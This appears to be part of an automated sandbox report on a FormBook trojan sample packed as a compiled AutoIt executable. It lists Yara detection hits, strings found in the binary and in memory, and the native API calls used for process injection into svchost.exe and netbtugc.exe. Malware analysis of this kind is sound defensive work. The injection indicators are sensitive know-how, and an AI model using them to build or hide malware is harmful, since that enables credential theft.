            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.24d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.24d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4574527555.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2270118769.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2269837439.00000000024D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4574542638.0000000002F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4575593241.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2270555889.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.24d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.24d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4574527555.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2270118769.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2269837439.00000000024D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4574542638.0000000002F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4575593241.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2270555889.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: QLLafoDdqv.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: QLLafoDdqv.exe, 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_868e7265-0
            Source: QLLafoDdqv.exe, 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0efbf333-e
            Source: QLLafoDdqv.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_91e74eef-6
            Source: QLLafoDdqv.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_2245d438-2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024FB363 NtClose,2_2_024FB363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024D1D09 NtProtectVirtualMemory,2_2_024D1D09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B60 NtClose,LdrInitializeThunk,2_2_02F72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_02F72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_02F72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F735C0 NtCreateMutant,LdrInitializeThunk,2_2_02F735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74340 NtSetContextThread,2_2_02F74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74650 NtSuspendThread,2_2_02F74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AF0 NtWriteFile,2_2_02F72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AD0 NtReadFile,2_2_02F72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AB0 NtWaitForSingleObject,2_2_02F72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BF0 NtAllocateVirtualMemory,2_2_02F72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BE0 NtQueryValueKey,2_2_02F72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BA0 NtEnumerateValueKey,2_2_02F72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B80 NtQueryInformationFile,2_2_02F72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EE0 NtQueueApcThread,2_2_02F72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EA0 NtAdjustPrivilegesToken,2_2_02F72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E80 NtReadVirtualMemory,2_2_02F72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E30 NtWriteVirtualMemory,2_2_02F72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FE0 NtCreateFile,2_2_02F72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FB0 NtResumeThread,2_2_02F72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FA0 NtQuerySection,2_2_02F72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F90 NtProtectVirtualMemory,2_2_02F72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F60 NtCreateProcessEx,2_2_02F72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F30 NtCreateSection,2_2_02F72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CF0 NtOpenProcess,2_2_02F72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CC0 NtQueryVirtualMemory,2_2_02F72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CA0 NtQueryInformationToken,2_2_02F72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C60 NtCreateKey,2_2_02F72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C00 NtQueryInformationProcess,2_2_02F72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DD0 NtDelayExecution,2_2_02F72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DB0 NtEnumerateKey,2_2_02F72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D30 NtUnmapViewOfSection,2_2_02F72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D10 NtMapViewOfSection,2_2_02F72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D00 NtSetInformationFile,2_2_02F72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73090 NtSetValueKey,2_2_02F73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73010 NtOpenDirectoryObject,2_2_02F73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F739B0 NtGetContextThread,2_2_02F739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73D70 NtOpenThread,2_2_02F73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73D10 NtOpenProcessToken,2_2_02F73D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03174340 NtSetContextThread,LdrInitializeThunk,4_2_03174340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03174650 NtSuspendThread,LdrInitializeThunk,4_2_03174650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172B60 NtClose,LdrInitializeThunk,4_2_03172B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_03172BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_03172BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172BE0 NtQueryValueKey,LdrInitializeThunk,4_2_03172BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172AD0 NtReadFile,LdrInitializeThunk,4_2_03172AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172AF0 NtWriteFile,LdrInitializeThunk,4_2_03172AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172F30 NtCreateSection,LdrInitializeThunk,4_2_03172F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172FB0 NtResumeThread,LdrInitializeThunk,4_2_03172FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172FE0 NtCreateFile,LdrInitializeThunk,4_2_03172FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_03172E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172EE0 NtQueueApcThread,LdrInitializeThunk,4_2_03172EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172D10 NtMapViewOfSection,LdrInitializeThunk,4_2_03172D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_03172D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172DD0 NtDelayExecution,LdrInitializeThunk,4_2_03172DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03172DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03172C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172C60 NtCreateKey,LdrInitializeThunk,4_2_03172C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_03172CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031735C0 NtCreateMutant,LdrInitializeThunk,4_2_031735C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031739B0 NtGetContextThread,LdrInitializeThunk,4_2_031739B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172B80 NtQueryInformationFile,4_2_03172B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172AB0 NtWaitForSingleObject,4_2_03172AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172F60 NtCreateProcessEx,4_2_03172F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172F90 NtProtectVirtualMemory,4_2_03172F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172FA0 NtQuerySection,4_2_03172FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172E30 NtWriteVirtualMemory,4_2_03172E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172EA0 NtAdjustPrivilegesToken,4_2_03172EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172D00 NtSetInformationFile,4_2_03172D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172DB0 NtEnumerateKey,4_2_03172DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172C00 NtQueryInformationProcess,4_2_03172C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172CC0 NtQueryVirtualMemory,4_2_03172CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03172CF0 NtOpenProcess,4_2_03172CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03173010 NtOpenDirectoryObject,4_2_03173010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03173090 NtSetValueKey,4_2_03173090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03173D10 NtOpenProcessToken,4_2_03173D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03173D70 NtOpenThread,4_2_03173D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02557A70 NtReadFile,4_2_02557A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02557B50 NtDeleteFile,4_2_02557B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02557BE0 NtClose,4_2_02557BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02557920 NtCreateFile,4_2_02557920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02557D30 NtAllocateVirtualMemory,4_2_02557D30
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0073D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0073D5EB
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00731201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00731201
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0073E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0073E8F6
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006DBF400_2_006DBF40
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006D80600_2_006D8060
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_007420460_2_00742046
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_007382980_2_00738298
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0070E4FF0_2_0070E4FF
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0070676B0_2_0070676B
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_007648730_2_00764873
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006DCAF00_2_006DCAF0
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006FCAA00_2_006FCAA0
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006ECC390_2_006ECC39
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00706DD90_2_00706DD9
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006EB1190_2_006EB119
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006D91C00_2_006D91C0
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006F13940_2_006F1394
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006F781B0_2_006F781B
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006E997D0_2_006E997D
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006D79200_2_006D7920
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006F7A4A0_2_006F7A4A
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006F7CA70_2_006F7CA7
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0075BE440_2_0075BE44
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00709EEE0_2_00709EEE
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_015C36200_2_015C3620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024D12902_2_024D1290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024E68732_2_024E6873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024E68712_2_024E6871
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024D28A02_2_024D28A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024E01732_2_024E0173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024D11102_2_024D1110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024DE1F32_2_024DE1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024D268A2_2_024D268A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024D26982_2_024D2698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024D26A02_2_024D26A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024DFF4A2_2_024DFF4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024FD7532_2_024FD753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024DFF532_2_024DFF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024D35002_2_024D3500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC02C02_2_02FC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE02742_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030003E62_2_030003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F02_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA3522_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030001AA2_2_030001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD20002_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF81CC2_2_02FF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC81582_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA1182_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F301002_2_02F30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5C6E02_2_02F5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C7C02_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F407702_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F647502_2_02F64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEE4F62_2_02FEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030005912_2_03000591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF24462_2_02FF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE44202_2_02FE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F405352_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA802_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF6BD72_2_02FF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFAB402_2_02FFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E8F02_2_02F6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F268B82_2_02F268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300A9A62_2_0300A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4A8402_2_02F4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F428402_2_02F42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A02_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F569622_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFEEDB2_2_02FFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52E902_2_02F52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFCE932_2_02FFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40E592_2_02F40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFEE262_2_02FFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4CFE02_2_02F4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32FC82_2_02F32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBEFA02_2_02FBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4F402_2_02FB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60F302_2_02F60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE2F302_2_02FE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F82F282_2_02F82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30CF22_2_02F30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0CB52_2_02FE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40C002_2_02F40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3ADE02_2_02F3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F58DBF2_2_02F58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDCD1F2_2_02FDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4AD002_2_02F4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE12ED2_2_02FE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B2C02_2_02F5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F452A02_2_02F452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F8739A2_2_02F8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2D34C2_2_02F2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF132D2_2_02FF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF70E92_2_02FF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF0E02_2_02FFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF0CC2_2_02FEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F470C02_2_02F470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B16B2_2_0300B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4B1B02_2_02F4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F1722_2_02F2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7516C2_2_02F7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF16CC2_2_02FF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF7B02_2_02FFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F314602_2_02F31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF43F2_2_02FFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDD5B02_2_02FDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF75712_2_02FF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEDAC62_2_02FEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDDAAC2_2_02FDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F85AA02_2_02F85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE1AA32_2_02FE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB3A6C2_2_02FB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFA492_2_02FFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF7A462_2_02FF7A46
